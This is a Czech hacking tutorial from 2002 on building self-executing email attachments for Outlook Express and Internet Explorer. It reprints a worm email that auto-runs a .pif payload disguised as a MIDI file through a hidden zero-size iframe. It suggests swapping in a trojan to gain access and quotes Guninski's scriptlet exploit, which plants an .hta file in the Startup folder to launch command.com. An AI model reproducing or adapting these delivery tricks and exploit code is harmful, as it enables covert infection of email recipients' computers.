Jak vytvořit samospustitelnou přílohu k emailu

Napsal: T-5 VRUGER <napis@zde.cz> (member of CHC)
 

Úvod

Takže, padnul dotaz o tom, jestli se dá vytvořit samospustitelná příloha k emailu. Nutno poznamenat, že tak trochu počítám s OS Windows a prohlížečem IE. Samozřejmě, tato samospustitelná příloha nebude fungovat v “freemejl web rozhraní”, tam je to nejenom chráněné, ale některé vůbec typ těchto zpráv nepodporují.

Omezení

Původně jsem si myslel, že ti blbci v Mrkvo$ovtu něco dělají, např. bezpečnostní záplaty. Ale to jsem se hrubě mýlil. Před nějakým čáskem se po síti šířil takový červík, pokud jste v Outlook (Express) klikli jenom (!) na náhled, došlo k aktivaci viru a následné posílání viru na kontakty v Adresáři na sebe nedalo dlouho čekat. Ale když jsem updatoval svůj okenní systém na Microsoft Explorer 6.0 (-> Outlook Express 6.0) chyba pořád fungovala. Tak jsem si stáhnul nový patch pro nějakou chybu v M IE, aplikoval a co to, CHYBA STÁLE FUNGOVALA. Takže to bude asi bez omezení, pokud nepoužíváte unix.

Formátované zprávy

Formátované zprávy, kdo by je dneska neznal. V podstatě jde o to, že do standartní emailové zprávy “inteligentní” emailový klient vloží HTML tagy tak, aby to uživatel nepoznal. Pak to vypadá, jako byste mohli používat tisíce druhů písma, pozadí, hudbu a vše, co umožňuje HTML bez toho, že by to “uživatel” mohl zpozorovat. Ale samozřejmě, i tato metoda má svojí stinnou stránku. Dá se lehce zneužít k průniku na uživatelův stroj.

Příklad 1: Standartní formátovaná zpráva Outlook Express 6.0

Reply-To: "T-5 VRUGER" <napis@zde.cz>
From: "T-5 VRUGER" <napis@zde.cz>
To: "napis@zde.cz"
Subject: akce
Date: Sun, 17 Mar 2002 08:29:28 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0035_01C1CD8D.DB714180"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

This is a multi-part message in MIME format.

------=_NextPart_000_0035_01C1CD8D.DB714180
Content-Type: text/plain;
charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable

Zejtra jdeme na akci Adrenalin_action

------=_NextPart_000_0035_01C1CD8D.DB714180
Content-Type: text/html;
charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-2">
<META content=3D"MSHTML 6.00.2713.1100" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff><FONT face=3DArial><FONT size=3D2>
<DIV>Zejtra jdeme na akci=20
<STRONG>Adrenalin_action</STRONG></DIV></FONT></FONT></BODY></HTML>

------=_NextPart_000_0035_01C1CD8D.DB714180--

Všimněte si poslední části zprávy, hlavně těch HTML tagů. Název akce, Adrenalin_action tedy bude napsáno TUČNĚ ...

A jistě znáte párový tag <IFRAME>, jde o podobné použití jako u tagu <FRAME>, ale tento rám je integrovaný do okna a po ukončení může text dále pokračovat.

Příklad 2: červík Pepík

From mail@ns1.xnet.cz Sun Mar 10 10:47:49 2002
Received: from ns1.xnet.cz ([213.151.79.57]:63663 "EHLO ns1.xnet.cz")
by data.centrum.cz with ESMTP id <S225839AbSCJJqy>;
Sun, 10 Mar 2002 10:46:54 +0100
Received: (from mail@localhost)
by ns1.xnet.cz (8.11.5/8.11.0) id g2A9fiU29867
for T_5_VRUGER@CENTRUM.CZ; Sun, 10 Mar 2002 10:41:44 +0100 (CET)
X-Envelope-To: napis@zde.cz
Received: from smtp2.vol.cz (smtp2.vol.cz [195.250.128.42])
by ns1.xnet.cz (8.11.5/8.11.0) with ESMTP id g2A9ffb21722
for <NAPIS@ZDE.CZ>; Sun, 10 Mar 2002 10:41:41 +0100 (CET)
Received: from Obhjdrsk (ostravaa-236.dialup.vol.cz [212.20.110.236])
by smtp2.vol.cz (8.11.6/8.11.3) with SMTP id g2A9kGm93796
for <NAPIS@ZDE.CZ>; Sun, 10 Mar 2002 10:46:16 +0100 (CET)
(envelope-from aubrecht@post.cz)
Date: Sun, 10 Mar 2002 10:46:16 +0100 (CET)
Message-Id: <200203100946.g2A9kGm93796@smtp2.vol.cz>
From: aubrecht <aubrecht@post.cz>
To: NAPIS@ZDE.CZ
Subject: Run in DOS mode.
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=I70Yg717uv5Vir40w79G14977N
Return-Path: <mail@ns1.xnet.cz>
X-Orcpt: rfc822;T_5_VRUGER@CENTRUM.CZ

--I70Yg717uv5Vir40w79G14977N
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:C25XT6794xzjVev1 height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>

--I70Yg717uv5Vir40w79G14977N
Content-Type: audio/x-midi;
name=mode..pif
Content-Transfer-Encoding: base64
Content-ID: <C25XT6794xzjVev1>

Následuje soubor:
....
JIl//xXsRYl/i8ZdX15bwhAAVldowCSJf/8V5EWJf4t8JAxXaCsuh3=9
--I70Yg717uv5Vir40w79G14977N--
 

O co jde?
Na napis@zde.cz mi přišel virus s tímto tělem. Chybu neodstraňuje zatím žádný patch microsoftu, takže aktivaci musel zabránit můj rezidentní antivirus.

Jak to funguje?
Za aktivaci jsou podle mě zodpovědné tyto tagy:

<iframe src=3Dcid:C25XT6794xzjVev1 height=3D0 width=3D0>
</iframe>

a příloha je pojmenovaná:

Content-ID: <C25XT6794xzjVev1>

Takže teoreticky, stačilo by zaměnit přílohu třeba za trojského koně a získat přístup.

Také jsem našel zmínku v knize Hacking bez tajemnství:

Kód Georgi Guninského zobrazil hlášení při startu systému a po přípojení na zadanou stránku měl Georgi přístup na počítač oběti.

Kód objektu:

<object id=”scr” classid=”clsid:06290BD5-48AA-11D2-8432-006008C3FBFC”>
</object>
<SCRIPT>
scr.Reset()
scr.Path=”C:\\windows\Start Menu\\Programs\\Start UP\\guninski.hta”;
scr.Doc=”<object id=’wsh’ classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B’> <object><SCRIPT>alert(‘Written bz Georgi Guninnski http://www.nat.bg/`joro’); wsh.Run(‘c:\\command.com’);</”+” SCRIPT>”;
scr.write()ů
</SCRIPT>

Tento kód by měl umožnit přístup po připojení na zadanou stránku.